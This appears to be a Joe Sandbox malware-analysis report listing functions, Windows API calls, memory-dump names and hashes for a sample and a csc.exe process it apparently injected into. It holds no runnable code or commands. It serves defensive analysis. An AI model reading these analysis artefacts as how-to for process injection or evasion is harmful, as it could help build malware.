Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
Instruction ID: 803a8c0a85031d8a487f3c77392b37c8e8e514e3928d7bb2bfe17150e8c059be
Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
Instruction Fuzzy Hash: CC118E73618B81CAD760EF29B4405AAB3A1FB457B4F144334E6BD8B6D6CF78D0428780

Function 00007FF67FA76730 Relevance: 7.6, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67FA767DE
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA76824
EnterCriticalSection.KERNEL32 ref: 00007FF67FA768F6
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA76917
EnterCriticalSection.KERNEL32 ref: 00007FF67FA7695F
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA76980

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
Instruction ID: c67c034f91ed65a1077cf6da3c7d35868f2b8507d48ad6d7a0001a3a29bb0d35
Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
Instruction Fuzzy Hash: 02616E63A28B82C4EA509F15E840FB663A0AF96B94F585236D98CC3765DF3CE485C3D0

Function 00007FF67FA71A50 Relevance: 7.6, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67FA71AEA
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA71B2F

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
Instruction ID: fbf90ef018d37ef748494e3d077524b8668c7814e3c7542c0e9c2c97ecfe84db
Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
Instruction Fuzzy Hash: 67514F73A2CB8281EA609F10E840BB673A4EFA5B94F585236D98DC3655DF3CE095C790

Function 00007FF67FA43540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF67FA435E0
RaiseFailFastException.KERNEL32 ref: 00007FF67FA436E9
RaiseFailFastException.KERNEL32 ref: 00007FF67FA43726

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF67FA435CA

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
Instruction ID: 82e8830466705c0c934fe99f18828132aca2af594a1e8e3136abc016e064862a
Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
Instruction Fuzzy Hash: 2B51A127E29742C1FE509B19D490B7A63A0EF48BD4F448132DA5EC77A0DF6CE495A380

Function 00007FF67FA80570 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF67FA5AF49), ref: 00007FF67FA805EB
SwitchToThread.KERNEL32(?,?,?,00007FF67FA5AF49), ref: 00007FF67FA80692
SwitchToThread.KERNEL32(?,?,?,00007FF67FA5AF49), ref: 00007FF67FA806A8

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction ID: 146e80ab63406fb7adc23e35b8f725c4d9391c2b8d6ec2dd276df948bb77ce5a
Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction Fuzzy Hash: 03418133B29686C5EBA58E29D050A7D73D0EB40B94F54D13ADB4EC6BC9DEBCE4408790

Function 00007FF67FA80E70 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F49
DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F66
DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F81
DebugBreak.KERNEL32(?,00000000,?,00007FF67FA5E7B5,?,?,0000000100000001,00007FF67FA6CA48), ref: 00007FF67FA80F9A

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction ID: dfafc197cb613c82cc78525ff204b919027d2d44d9ccfb94df65c2fda0075649
Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction Fuzzy Hash: 3D41C523A2D6C2C5EA629B119140B7A67E0EF44B54F19D434DE4C87395DFBCE881C3D0

Function 00007FF67FA6F280 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F339
DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F356
DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F376
DebugBreak.KERNEL32(?,?,00000000,?,00007FF67FA6B16E,?,?,-8000000000000000,00007FF67FA7E9AE,?,?,?,00007FF67FA588C3), ref: 00007FF67FA6F399

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
Instruction ID: bf87684582f42af4d6fe1b8566fe00bc2fd638f279474d5c3a1995ba801908a2
Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
Instruction Fuzzy Hash: BB31E563619743C2EA659F29A040A79B7A4FF45B94F180034EA6D8B785FF3CD480C3C0

Function 00007FF67FA4B520 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B554
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B55E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B57D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67FA453F1), ref: 00007FF67FA4B591

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction ID: 212061513c02a8481288ff2db5a97c794ff5ea867ee6e467ecf22bd8b0edc613
Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction Fuzzy Hash: D111733262C755C6D7144B6DF44093AB365FB85B90F140135FA9E93B95CF7CD4448B80

Function 00007FF67FAAB27C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF67FAAB2A8
GetCurrentThreadId.KERNEL32 ref: 00007FF67FAAB2B6
GetCurrentProcessId.KERNEL32 ref: 00007FF67FAAB2C2
QueryPerformanceCounter.KERNEL32 ref: 00007FF67FAAB2D2

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction ID: 5affee06e3726e4dd418f078997683a1be39354dbe6a9f7c68d2edb9300698bf
Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
Instruction Fuzzy Hash: 20112122B24F018AEF00CF60E8546B933A4F75AB58F440E35DA9D877A4DF7CD1948380

Function 00007FF67FAAC658 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FAAB963), ref: 00007FF67FAAC6A8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FAAB963), ref: 00007FF67FAAC6E9

Strings

csm, xrefs: 00007FF67FAAC6D6

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction ID: 936c921d35478e610dc2a6dad5d8a63eaaeee0c6b3cca087140b4fdd9a5ff715
Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction Fuzzy Hash: D0112B33628B8182EB61CF15F440669B7E4FB88B84F586231DE8D47768EF3CD5558B40

Function 00007FF67FA4D050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF67FA4C313,?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4D08B
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF67FA4C313,?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4D0C8

Strings

HeapVerify, xrefs: 00007FF67FA4D05F

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: _stricmpstrtoull
String ID: HeapVerify
API String ID: 4031153986-2674988305
Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction ID: 5dd4b44f682b7a5bc443e9471970ebd26f1e2db82aec32d09ba76ebacf814cb3
Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
Instruction Fuzzy Hash: DD015232A29A42D9EB50AF15E9804B973E0FB99B80F549135DA4E83B59CF3DD442C6C0

Function 00007FF67FA73260 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA732ED
LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA7333E
EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA73374
LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF67FA5D6BF,01FFF001,00000000,00000000,00007FF67FA6BD4F), ref: 00007FF67FA7338F

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
Instruction ID: 075d976460104eb2688db1349c80442c5f23ed6fdc496670798fda2af33ea9b0
Opcode Fuzzy Hash: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
Instruction Fuzzy Hash: 30417C63E2C782C1EA208F15E840F7A7390AB56B98F544236DA5DC7A99CF3CE585D3D0

Function 00007FF67FA64020 Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA6406A
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640AC
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640D7
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67FA6419F,?,?,?,00007FF67FA71E7B), ref: 00007FF67FA640F8

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction ID: 62c015cdd23716da8fd3cad44bc5ee171dcf6b68913673f268dd1d3051a11d92
Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
Instruction Fuzzy Hash: A82144A3A2894281EA10CB14E880BB52350EF61BA8F986336D92CC25D5DF7CE595C381

Analysis Process: csc.exePID: 4340, Parent PID: 6924COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	8.1%
Total number of Nodes:	570
Total number of Limit Nodes:	71

Executed Functions

Function 0510A036 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0510A19F

Strings

0, xrefs: 0510A227

Memory Dump Source

Source File: 00000005.00000002.2191589161.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5100000_csc.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: fe9dd7e7b0b0c2e715e31550d0626ecd1c021dd4df7530c907bbb1ee24ecd1d8
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: 4BF16274618A4C8FDBA5EF68C898AEEB7E0FF98304F40462AD44ED7291DF749542CB41

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A432, 0041A440

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
Instruction ID: 6fb213b5ecae9b2d78436e96d981fe4cc20fd8036c0d356658e2c76b782acd04
Opcode Fuzzy Hash: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
Instruction Fuzzy Hash: F0F0F4B2200118ABCB08DF99DC80EEB77ADEF8C754F158248BE0D97241D630E811CBA0

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A432, 0041A440

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0510A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0510A19F

Strings

0, xrefs: 0510A0CD

Memory Dump Source

Source File: 00000005.00000002.2191589161.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

